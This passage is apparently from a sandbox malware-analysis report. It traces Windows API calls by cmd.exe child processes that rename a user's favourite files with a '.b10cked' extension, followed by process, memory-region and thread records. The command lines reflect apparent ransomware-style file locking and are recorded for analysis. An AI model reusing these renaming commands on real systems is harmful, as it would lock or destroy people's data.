hFindFile=0x2c0040 | out: hFindFile=0x2c0040) returned 1 [0215.131] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0215.131] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0215.131] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0215.131] GetEnvironmentStringsW () returned 0x2c2b20* [0215.131] FreeEnvironmentStringsW (penv=0x2c2b20) returned 1 [0215.131] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.131] GetConsoleOutputCP () returned 0x1b5 [0215.131] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.131] GetUserDefaultLCID () returned 0x409 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14fb28, cchData=128 | out: lpLCData="0") returned 2 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14fb28, cchData=128 | out: lpLCData="0") returned 2 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14fb28, cchData=128 | out: lpLCData="1") returned 2 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0215.132] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 
[0215.132] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0215.134] GetConsoleTitleW (in: lpConsoleTitle=0x2b0900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.134] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0215.134] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0215.134] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0215.134] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0215.135] _wcsicmp (_String1="move", _String2=")") returned 68 [0215.135] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0215.135] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0215.135] _wcsicmp (_String1="IF", _String2="move") returned -4 [0215.135] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0215.135] _wcsicmp (_String1="REM", _String2="move") returned 5 [0215.135] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0215.138] GetConsoleTitleW (in: lpConsoleTitle=0x14f820, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0215.138] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0215.138] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0215.138] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0215.138] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0215.138] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0215.138] _wcsicmp (_String1="move", _String2="CD") returned 10 [0215.138] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0215.138] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0215.138] _wcsicmp (_String1="move", _String2="REN") returned -5 [0215.138] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0215.138] _wcsicmp (_String1="move", _String2="SET") returned -6 [0215.138] _wcsicmp (_String1="move", _String2="PAUSE") returned 
-3 [0215.138] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0215.138] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0215.138] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0215.138] _wcsicmp (_String1="move", _String2="MD") returned 11 [0215.138] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0215.138] _wcsicmp (_String1="move", _String2="RD") returned -5 [0215.138] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0215.138] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0215.138] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0215.138] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0215.138] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0215.138] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0215.138] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0215.138] _wcsicmp (_String1="move", _String2="VER") returned -9 [0215.138] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0215.138] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0215.139] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0215.139] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0215.139] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0215.139] _wcsicmp (_String1="move", _String2="START") returned -6 [0215.139] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0215.139] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0215.139] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0215.140] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.140] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0215.140] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f5dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f5d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f5d4*=0x90c08a66, 
lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0215.140] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0215.140] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0215.140] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0215.140] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0215.140] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0215.140] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp 
(_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0215.141] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0215.141] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0215.141] _wcsicmp (_String1="MSNENT~1.URL", _String2=".") returned 63 [0215.141] _wcsicmp (_String1="MSNENT~1.URL", _String2="..") returned 63 [0215.142] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnent~1.url")) returned 0x20 [0215.142] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2c1e90 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0215.142] SetErrorMode (uMode=0x0) returned 0x0 [0215.142] SetErrorMode (uMode=0x1) returned 0x0 [0215.142] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL", nBufferLength=0x104, lpBuffer=0x14ef64, lpFilePart=0x14ef4c | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL", lpFilePart=0x14ef4c*="MSNENT~1.URL") returned 0x2f [0215.142] SetErrorMode (uMode=0x0) returned 0x1 [0215.142] GetFileAttributesW 
(lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1" (normalized: "c:\\users\\default\\favori~1\\msnweb~1")) returned 0x12 [0215.142] _wcsicmp (_String1="MSNENT~1.URL", _String2=".") returned 63 [0215.142] _wcsicmp (_String1="MSNENT~1.URL", _String2="..") returned 63 [0215.142] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msnent~1.url")) returned 0x20 [0215.142] SetErrorMode (uMode=0x0) returned 0x0 [0215.142] SetErrorMode (uMode=0x1) returned 0x0 [0215.142] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL", nBufferLength=0x104, lpBuffer=0x14f3e0, lpFilePart=0x14f178 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL", lpFilePart=0x14f178*="MSNENT~1.URL") returned 0x2f [0215.142] SetErrorMode (uMode=0x0) returned 0x1 [0215.142] SetErrorMode (uMode=0x0) returned 0x0 [0215.142] SetErrorMode (uMode=0x1) returned 0x0 [0215.142] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked", nBufferLength=0x104, lpBuffer=0x14f5e8, lpFilePart=0x14f178 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked", lpFilePart=0x14f178*="MSN Entertainment.url.b10cked") returned 0x40 [0215.143] SetErrorMode (uMode=0x0) returned 0x1 [0215.143] SetLastError (dwErrCode=0x0) [0215.143] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn entertainment.url.b10cked")) returned 0xffffffff [0215.143] GetLastError () returned 0x2 [0215.143] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL", fInfoLevelId=0x1, lpFindFileData=0x14eaf4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14eaf4) returned 0x2b0ef0 [0215.143] FindNextFileW (in: hFindFile=0x2b0ef0, lpFindFileData=0x14eaf4 | out: 
lpFindFileData=0x14eaf4) returned 0 [0215.143] GetLastError () returned 0x12 [0215.143] FindClose (in: hFindFile=0x2b0ef0 | out: hFindFile=0x2b0ef0) returned 1 [0215.144] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNENT~1.URL", fInfoLevelId=0x1, lpFindFileData=0x2c1c30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2c1c30) returned 0x2b0ef0 [0215.144] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked", nBufferLength=0x104, lpBuffer=0x14ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked", lpFilePart=0x0) returned 0x40 [0215.144] GetFullPathNameW (in: lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url", nBufferLength=0x104, lpBuffer=0x14ed8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url", lpFilePart=0x0) returned 0x38 [0215.144] GetFileAttributesW (lpFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn entertainment.url")) returned 0x20 [0215.144] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn entertainment.url"), lpNewFileName="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Entertainment.url.b10cked" (normalized: "c:\\users\\default\\favori~1\\msnweb~1\\msn entertainment.url.b10cked"), dwFlags=0x3) returned 1 [0215.145] FindClose (in: hFindFile=0x2b0ef0 | out: hFindFile=0x2b0ef0) returned 1 [0215.145] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14ed40 | out: _Buffer=" 1") returned 9 [0215.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.145] GetFileType (hFile=0x7) returned 0x2 [0215.239] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0215.239] GetConsoleMode (in: hConsoleHandle=0x7, 
lpMode=0x14eccc | out: lpMode=0x14eccc) returned 1 [0215.239] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.239] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14ed00 | out: lpConsoleScreenBufferInfo=0x14ed00) returned 1 [0215.239] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0215.240] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14ed40 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0215.240] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14ed24, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14ed24*=0x1a) returned 1 [0215.240] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.240] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0215.240] _get_osfhandle (_FileHandle=1) returned 0x7 [0215.240] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0215.240] _get_osfhandle (_FileHandle=0) returned 0x3 [0215.240] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0215.241] SetConsoleInputExeNameW () returned 0x1 [0215.241] GetConsoleOutputCP () returned 0x1b5 [0215.241] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.241] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.241] exit (_Code=0) Process: id = "536" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16720" os_pid = "0x638" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31762 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31763 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31764 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31765 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 31766 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31767 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31768 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31769 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007ffb0000" filename = "" Region: id = 31770 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31771 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31878 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31879 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31880 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31881 start_va = 0x380000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 31882 start_va = 0x580000 end_va = 0x58ffff entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 31883 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31884 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31885 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31886 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename 
= "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31887 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31888 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31889 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31890 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31891 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31892 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31893 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31894 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31895 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 31896 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 31897 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 31898 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 31899 start_va = 0x590000 end_va = 0x690fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 31900 start_va = 0x6a0000 end_va = 0x129ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 31901 start_va = 0x12a0000 end_va = 0x1402fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012a0000" filename = "" Thread: id = 737 os_tid = 0xb98 [0215.419] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fe9c | out: lpSystemTimeAsFileTime=0x28fe9c*(dwLowDateTime=0xb533caa0, dwHighDateTime=0x1d440a9)) [0215.419] GetCurrentProcessId () returned 0x638 [0215.419] GetCurrentThreadId () returned 0xb98 [0215.419] GetTickCount () returned 0x3c4c4 [0215.419] QueryPerformanceCounter (in: lpPerformanceCount=0x28fe94 | out: lpPerformanceCount=0x28fe94*=27220793393) returned 1 [0215.419] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0215.420] __set_app_type (_Type=0x1) [0215.420] __p__fmode () returned 0x76b331f4 [0215.420] __p__commode () returned 0x76b331fc [0215.420] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0215.420] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0215.420] GetCurrentThreadId () returned 0xb98 [0215.420] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb98) returned 0x38 [0215.420] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 
0x76910000 [0215.420] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0215.420] SetThreadUILanguage (LangId=0x0) returned 0x409 [0215.421] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0215.421] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28fe2c | out: phkResult=0x28fe2c*=0x0) returned 0x2 [0215.421] VirtualQuery (in: lpAddress=0x28fe63, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.421] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0215.421] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0215.421] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0215.422] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28fdfc, dwLength=0x1c | out: lpBuffer=0x28fdfc*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x7000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0215.422] GetConsoleOutputCP () returned 0x1b5 [0215.422] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0215.422] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) 
